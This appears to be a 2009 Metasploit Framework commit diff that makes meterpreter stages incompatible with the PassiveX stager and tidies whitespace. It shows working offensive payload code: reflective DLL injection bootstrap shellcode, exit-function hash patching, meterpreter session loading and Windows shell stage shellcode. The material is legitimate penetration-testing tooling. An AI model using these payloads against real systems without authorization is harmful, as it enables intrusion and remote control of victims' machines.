Fixes #517. Disables meterpreter stages for passivex stagers

git-svn-id: file:///home/svn/framework3/trunk@7546 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-16 22:45:33 +00:00 · 2009-11-16 22:45:33 +00:00 · dc0dc98771
parent 777317d0ad
commit dc0dc98771
5 changed files with 39 additions and 35 deletions
--- a/lib/msf/core/payload/windows/dllinject.rb
+++ b/lib/msf/core/payload/windows/dllinject.rb
@ -17,7 +17,7 @@ module Payload::Windows::DllInject
 			'Name'          => 'Windows Inject DLL',
 			'Version'       => '$Revision$',
 			'Description'   => 'Inject a custom DLL into the exploited process',
-			'Author'        => 
+			'Author'        =>
 				[
 					'jt <jt@klake.org>',
 					'skape',
@ -27,7 +27,7 @@ module Payload::Windows::DllInject
 			'Arch'          => ARCH_X86,
 			'PayloadCompat' =>
 				{
-					'Convention' => 'sockedi'
+					'Convention' => 'sockedi -passivex',
 				},
 			'Stage'         =>
 				{
@ -233,4 +233,5 @@ module Payload::Windows::DllInject

 end

-end
+end
+
--- a/lib/msf/core/payload/windows/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/reflectivedllinject.rb
@ -25,20 +25,20 @@ module Payload::Windows::ReflectiveDllInject
 			'References'    => [ [ 'URL', 'http://www.harmonysecurity.com/ReflectiveDllInjection.html' ] ],
 			'Platform'      => 'win',
 			'Arch'          => ARCH_X86,
-			'PayloadCompat' => 
-				{ 
-					'Convention' => 'sockedi'
+			'PayloadCompat' =>
+				{
+					'Convention' => 'sockedi -passivex',
 				},
-			'Stage'         => 
-				{ 
-					'Offsets' => 
-						{ 
-							'EXITFUNC' => [ 33, 'V' ] 
-						}, 
-					'Payload' => "" 
+			'Stage'         =>
+				{
+					'Offsets' =>
+						{
+							'EXITFUNC' => [ 33, 'V' ]
+						},
+					'Payload' => ""
 				}
 			))
-      
+
 		register_options( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class )
 	end

@ -49,12 +49,12 @@ module Payload::Windows::ReflectiveDllInject
 	def stage_payload
 		dll    = ""
 		offset = 0
-    
+
 		begin
 			File.open( library_path, "rb" ) { |f| dll += f.read }

 			pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
-      		
+
 			pe.exports.entries.each do |entry|
 				if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
 					offset = pe.rva_to_file_offset( entry.rva )
@ -62,14 +62,14 @@ module Payload::Windows::ReflectiveDllInject
 				end
 			end

-			raise "Can't find an exported ReflectiveLoader function!" if offset == 0 
+			raise "Can't find an exported ReflectiveLoader function!" if offset == 0
 		rescue
 			print_error( "Failed to read and parse Dll file: #{$!}" )
 			return
 		end
-		
+
 		exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
-		
+
 		bootstrap = "\x4D" +                            # dec ebp             ; M
 					"\x5A" +                            # pop edx             ; Z
 					"\xE8\x00\x00\x00\x00" +            # call 0              ; call next instruction
@ -89,21 +89,21 @@ module Payload::Windows::ReflectiveDllInject
 					"\x68\x05\x00\x00\x00" +            # push 0x5            ; signal we have detached
 					"\x50" +                            # push eax            ; some value for hinstance
 					"\xFF\xD3"                          # call ebx            ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
-					
+
 		# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
 		if( bootstrap.length > 62 )
 			print_error( "Reflective Dll Injection (x86) generated an oversized bootstrap!" )
 			return
 		end
-		
+
 		# patch the bootstrap code into the dll's DOS header...
 		dll[ 0, bootstrap.length ] = bootstrap
-		
+
 		# return our stage to be loaded by the intermediate stager
 		return dll
 	end
-  
+
 end

-end 
+end

--- a/modules/payloads/stagers/windows/passivex.rb
+++ b/modules/payloads/stagers/windows/passivex.rb
@ -3,7 +3,7 @@
 ##

 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@ -29,7 +29,7 @@ module Metasploit3
 			'Platform'      => 'win',
 			'Arch'          => ARCH_X86,
 			'Handler'       => Msf::Handler::PassiveX,
-			'Convention'    => 'sockedi',
+			'Convention'    => 'sockedi passivex',
 			'Stager'        =>
 				{
 					'Offsets' =>
@ -67,7 +67,7 @@ module Metasploit3
 				}
 			))
 	end
-	
+
 	#
 	# Do not transmit the stage over the connection.  We send the stage via an
 	# HTTP request.
@ -83,13 +83,13 @@ module Metasploit3
 		# we must manually patch in the exit funk for this stager as it uses the old hash values
 		# which are generated using a different algorithm to that of the new hash values. We do this
 		# as this stager code has not been rewritten using the new api calling technique (see block_api.asm).
-		
+
 		# set a default exitfunk if one is not set
 		datastore['EXITFUNC'] = 'thread' if not datastore['EXITFUNC']
 		# retrieve the offset/pack type for this stager's exitfunk
 		offset, pack = offsets['EXITFUNC']
 		# patch in the appropriate exit funk (using the old exit funk hashes).
-		p[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore['EXITFUNC'] == 'seh' 
+		p[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore['EXITFUNC'] == 'seh'
 		p[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore['EXITFUNC'] == 'thread'
 		p[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore['EXITFUNC'] == 'process'

@ -115,3 +115,4 @@ module Metasploit3
 	end

 end
+
--- a/modules/payloads/stages/windows/meterpreter.rb
+++ b/modules/payloads/stages/windows/meterpreter.rb
@ -3,7 +3,7 @@
 ##

 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@ -60,9 +60,9 @@ module Metasploit3
 	def on_session(session)
 		super
 		if (datastore['AutoLoadStdapi'] == true)
-			session.load_stdapi 
+			session.load_stdapi
 			if (framework.exploits.create(session.via_exploit).privileged?)
-				session.load_priv 
+				session.load_priv
 			end
 		end
 		if (datastore['AutoRunScript'].empty? == false)
@ -72,4 +72,5 @@ module Metasploit3
 		end
 	end

-end
+end
+
--- a/modules/payloads/stages/windows/shell.rb
+++ b/modules/payloads/stages/windows/shell.rb
@ -3,7 +3,7 @@
 ##

 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@ -37,7 +37,7 @@ module Metasploit3
 						{
 							'EXITFUNC' => [ 210, 'V' ]
 						},
-					'Payload' =>  
+					'Payload' =>
 						"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
 						"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
 						"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
@ -58,3 +58,4 @@ module Metasploit3
 	end

 end
+